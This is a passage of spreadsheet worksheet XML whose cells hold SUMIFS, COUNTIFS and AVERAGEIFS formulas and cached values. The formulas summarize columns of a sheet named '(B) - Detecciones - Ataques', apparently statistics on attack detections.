        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>4.5</v>
      </c>
      <c r="CY145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH145" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.053333333</v>
      </c>
      <c r="DI145" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ145" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DE$3:$DE$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.181818182</v>
      </c>
      <c r="DK145" s="271"/>
    </row>
    <row r="146">
      <c r="J146" s="277"/>
      <c r="K146" s="512"/>
      <c r="L146" s="512"/>
      <c r="M146" s="512"/>
      <c r="N146" s="512"/>
      <c r="O146" s="278"/>
      <c r="Q146" s="271"/>
      <c r="R146" s="352" t="s">
        <v>2566</v>
      </c>
      <c r="S146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3826367896</v>
      </c>
      <c r="T146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="U146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.854824561</v>
      </c>
      <c r="V146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>4.671875</v>
      </c>
      <c r="W146" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>14</v>
      </c>
      <c r="X146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>7634.571429</v>
      </c>
      <c r="Y146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>81.225</v>
      </c>
      <c r="Z146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8583.301414</v>
      </c>
      <c r="AA146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>2.343169444</v>
      </c>
      <c r="AB146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>27.7109375</v>
      </c>
      <c r="AC146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>6.15</v>
      </c>
      <c r="AD146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.226516751</v>
      </c>
      <c r="AE146" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>8.12</v>
      </c>
      <c r="AF146" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EU$3:$EU$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>4.229356923</v>
      </c>
      <c r="AG146" s="271"/>
      <c r="AH146" s="352" t="s">
        <v>2566</v>
      </c>
      <c r="AI146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.1819402459</v>
      </c>
      <c r="AJ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1.75</v>
      </c>
      <c r="AL146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="AN146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.5763157895</v>
      </c>
      <c r="AR146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.833333333</v>
      </c>
      <c r="AS146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>6</v>
      </c>
      <c r="AV146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.6875</v>
      </c>
      <c r="AY146" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BA146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>14</v>
      </c>
      <c r="BB146" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>17812.33333</v>
      </c>
      <c r="BD146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>15459.55935</v>
      </c>
      <c r="BN146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1060.641673</v>
      </c>
      <c r="BO146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.004901961</v>
      </c>
      <c r="BR146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>5</v>
      </c>
      <c r="BT146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1.081300813</v>
      </c>
      <c r="CA146" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC146" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>4</v>
      </c>
      <c r="CG146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>3</v>
      </c>
      <c r="CI146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>33</v>
      </c>
      <c r="CJ146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>85.5</v>
      </c>
      <c r="CN146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>3.125</v>
      </c>
      <c r="CP146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>21.5</v>
      </c>
      <c r="CQ146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.06229986167</v>
      </c>
      <c r="CT146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>5</v>
      </c>
      <c r="CY146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH146" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.055555556</v>
      </c>
      <c r="DI146" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ146" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EU$3:$EU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.363636364</v>
      </c>
      <c r="DK146" s="271"/>
    </row>
    <row r="147">
      <c r="J147" s="277"/>
      <c r="K147" s="512"/>
      <c r="L147" s="512"/>
      <c r="M147" s="512"/>
      <c r="N147" s="512"/>
      <c r="O147" s="278"/>
      <c r="Q147" s="271"/>
      <c r="R147" s="352" t="s">
